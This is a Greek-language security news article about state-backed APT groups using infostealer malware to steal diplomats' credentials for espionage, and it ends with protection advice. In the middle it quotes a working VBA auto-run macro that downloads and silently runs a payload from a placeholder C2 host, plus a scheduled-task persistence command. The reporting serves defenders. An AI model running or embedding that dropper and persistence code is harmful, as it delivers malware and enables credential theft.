ΑρχικήSecurityAPT ομάδες στρέφονται στα infostealer για στοχευμένες επιθέσεις

APT ομάδες στρέφονται στα infostealer για στοχευμένες επιθέσεις

Το infostealer malware, το οποίο αρχικά σχεδιάστηκε για να συλλέγει μαζικά credentials από παραβιασμένα συστήματα, έχει εξελιχθεί σε ένα ισχυρό όπλο για τις κρατικά υποστηριζόμενες hacking ομάδες (Advanced Persistent Threat – APT).

infostealer apt

Από τις αρχές του 2023, malware όπως τα RedLine, Lumma και StealC έχουν διαδοθεί μέσω εκστρατειών phishing και κακόβουλων λήψεων. Αυτά τα infostealers συλλέγουν δεδομένα από προγράμματα περιήγησης, cookies και πληροφορίες συστήματος, αλλά πρόσφατες πληροφορίες αποκαλύπτουν μια ανησυχητική αλλαγή: τα διαπιστευτήρια , που κλέβουν αυτά τα infostealer, τώρα χρησιμοποιούνται ως όπλα για ιδιαίτερα στοχευμένες επιχειρήσεις κατασκοπείας.

Οι κύριοι τρόποι επίθεσης για τα infostealers παραμένουν τα spear-phishing emails που περιέχουν έγγραφα με κακόβουλα macros ή ψεύτικα software installers. Τα θύματα λαμβάνουν ένα συνημμένο Word με ένα macro VBA που, όταν ενεργοποιηθεί, κατεβάζει το stealer payload από έναν διακομιστή εντολών και ελέγχου (C2).

Δείτε επίσης: ‘Sindoor Dropper’: Νέα malware καμπάνια στοχεύει Linux

Μετά την εκτέλεση, το κακόβουλο λογισμικό εντοπίζει και εξάγει αποθηκευμένα διαπιστευτήρια για email, VPN και εταιρικές πύλες SSO.

Αναλυτές infostealer malware σημείωσαν ότι παραβιασμένα διαπιστευτήρια διπλωματών από πολλά Υπουργεία Εξωτερικών έχουν εμφανιστεί σε dumps του darknet, παρέχοντας πρόσβαση σε στόχους υψηλής αξίας.

Μόλις οι ομάδες APT αποκτήσουν έγκυρα διαπιστευτήρια email – συχνά μέσω μολύνσεων Infostealer – δημιουργούν πρόσθετες εκστρατείες spear-phishing. Αυτές οι εκστρατείες παρακάμπτουν τις παραδοσιακές ανιχνεύσεις χρησιμοποιώντας την αξιοπιστία των αποστολέων και έγκυρα πιστοποιητικά TLS.

Super Mario 3: Mario Forever malware

Μέχρι τα μέσα του 2025, η πλατφόρμα απειλών της Hudson Rock ανίχνευσε πάνω από 1.400 παραβιασμένους χρήστες στο Υπουργείο Εξωτερικών του Κατάρ και εκατοντάδες άλλους στη Σαουδική Αραβία, τη Νότια Κορέα και τα ΗΑΕ.

Δείτε επίσης: JSCoreRunner: Mac malware διανέμεται μέσω PDF Conversion Site

Σε ένα περιστατικό, που εξέτασαν οι ερευνητές, ένας παραβιασμένος λογαριασμός της πρεσβείας του Ομάν στο Παρίσι χρησιμοποιήθηκε για να μεταδώσει κακόβουλες προσκλήσεις σε αξιωματούχους του ΟΗΕ. Το email περιείχε ένα έγγραφο Word με ένα macro “sysProcUpdate” που εκτελούσε το ακόλουθο VBA code snippet:

Sub AutoOpen()
    Dim objXML As Object
    Set objXML = CreateObject("MSXML2.XMLHTTP")
    objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
    objXML.Send
    If objXML.Status = 200 Then
        With CreateObject("ADODB.Stream")
            .Type = 1
            .Open
            .Write objXML.responseBody
            .SaveToFile Environ("TEMP") & "\update.exe", 2
        End With
        Shell Environ("TEMP") & "\update.exe", vbHide
    End If
End Sub

Μετά την παράδοση, το “update.exe” payload δημιουργεί persistence δημιουργώντας ένα Windows Scheduled Task:

schtasks /Create /SC MINUTE /MO 15 /TN "SysProcUpdate" /TR "%TEMP%\update.exe"

Ερευνητές εντόπισαν ότι αυτός ο μηχανισμός persistence εξασφαλίζει επαναλαμβανόμενη εκτέλεση ακόμη και μετά από επανεκκινήσεις του συστήματος, διευκολύνοντας την μακροπρόθεσμη πρόσβαση.

Εμβαθύνοντας στον μηχανισμό μόλυνσης, τα infostealer εκμεταλλεύονται την εμπιστοσύνη των χρηστών και τον ανεπαρκή έλεγχο των τελικών σημείων.

Μετά την αρχική παραβίαση μέσω phishing, το payload χρησιμοποιεί κοινά Windows APIs – όπως το CryptUnprotectData – για να αποκρυπτογραφήσει αποθηκευμένα διαπιστευτήρια από προγράμματα περιήγησης και το Windows Credential Manager.

Επιλογή της ομάδας

🔑 Ασφαλίστε τους κωδικούς σας με Proton Pass

Password manager από την Proton — end-to-end κρυπτογράφηση, passkeys, ενσωματωμένο 2FA και παρακολούθηση για διαρροές των στοιχείων σας.

  • ✔ Κρυπτογραφημένη αποθήκευση κωδικών & passkeys
  • ✔ Ειδοποίηση αν κάποιος κωδικός σας διέρρευσε (Dark Web Monitoring)
  • ✔ Δωρεάν έκδοση — σε όλες τις συσκευές
Αποκτήστε δωρεάν το Proton Pass →

Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.

Δείτε επίσης: Velociraptor: Κατάχρηση του εργαλείου DFIR για remote access

Η μονάδα εξαγωγής στη συνέχεια συσκευάζει τα συλλεγμένα δεδομένα σε κρυπτογραφημένα blobs και τα μεταδίδει μέσω HTTPS για να αποφύγει τα συστήματα ανίχνευσης εισβολών.

Μόλις τα διαπιστευτήρια φτάσουν στην υποδομή των επιτιθέμενων, οι ομάδες APT τα χρησιμοποιούν ως νόμιμες συνδέσεις, παρακάμπτοντας τον πολυπαραγοντικό έλεγχο ταυτότητας.

Ενσωματώνοντας το κακόβουλο λογισμικό μέσα σε έγγραφα που φαίνονται νόμιμα και μιμούμενοι νόμιμα maintenance tasks, οι επιτιθέμενοι διατηρούν χαμηλό προφίλ, καθιστώντας την ανίχνευση εξαιρετικά δύσκολη.

APT ομάδες στρέφονται στα infostealer για στοχευμένες επιθέσεις

Προστασία από infostealer malware

Οι μέθοδοι στατικής ανίχνευσης για ασφάλεια δεν είναι αρκετές για την αποφυγή malware. Μια πιο ισχυρή προσέγγιση θα πρέπει να ενσωματώνει λογισμικό προστασίας από ιούς, εξοπλισμένο με προηγμένες δυνατότητες ανάλυσης.

Επίσης, είναι σημαντικό να διατηρείτε το λειτουργικό σύστημα και τις εφαρμογές σας ενημερωμένες. Οι ενημερώσεις αυτές συχνά περιλαμβάνουν διορθώσεις ασφαλείας που μπορούν να προστατεύσουν τον υπολογιστή σας από τις πιο πρόσφατες απειλές.

Η εκπαίδευση στην ασφάλεια των πληροφοριών είναι επίσης ζωτικής σημασίας. Αυτό σημαίνει ότι πρέπει να γνωρίζετε πώς να αναγνωρίζετε και να αποφεύγετε τις επιθέσεις phishing, τις οποίες οι επιτιθέμενοι συχνά χρησιμοποιούν για να εγκαταστήσουν infostealer.

Δείτε επίσης: PromptLock: Το πρώτο AI-powered ransomware

Επίσης, μην ξεχνάτε τη χρήση firewalls και την παρακολούθηση του network traffic που θα σας βοηθήσει να εντοπίσετε άμεσα ύποπτη δραστηριότητα. Συνιστάται, ακόμα, να αποφεύγετε εκτελέσιμα αρχεία που λαμβάνονται από περίεργους ιστότοπους.

Τέλος, η χρήση δυνατών κωδικών πρόσβασης και η ενεργοποίηση της διαδικασίας επαλήθευσης δύο παραγόντων μπορεί να προσφέρει επιπλέον επίπεδο προστασίας. Αυτό μπορεί να δυσκολέψει τους επιτιθέμενους να αποκτήσουν πρόσβαση στον λογαριασμό σας, ακόμη και αν καταφέρουν να κλέψουν τον κωδικό πρόσβασής σας.

📧
Εγγραφείτε στο Newsletter του SecNews

Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο Inbox σας.

Digital Fortress
Digital Fortresshttps://www.secnews.gr
Pursue Your Dreams & Live!

ΑΝΑΖΗΤΗΣΗ

FOLLOW US

📧
Newsletter SecNews
Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο inbox σας.

LIVE NEWS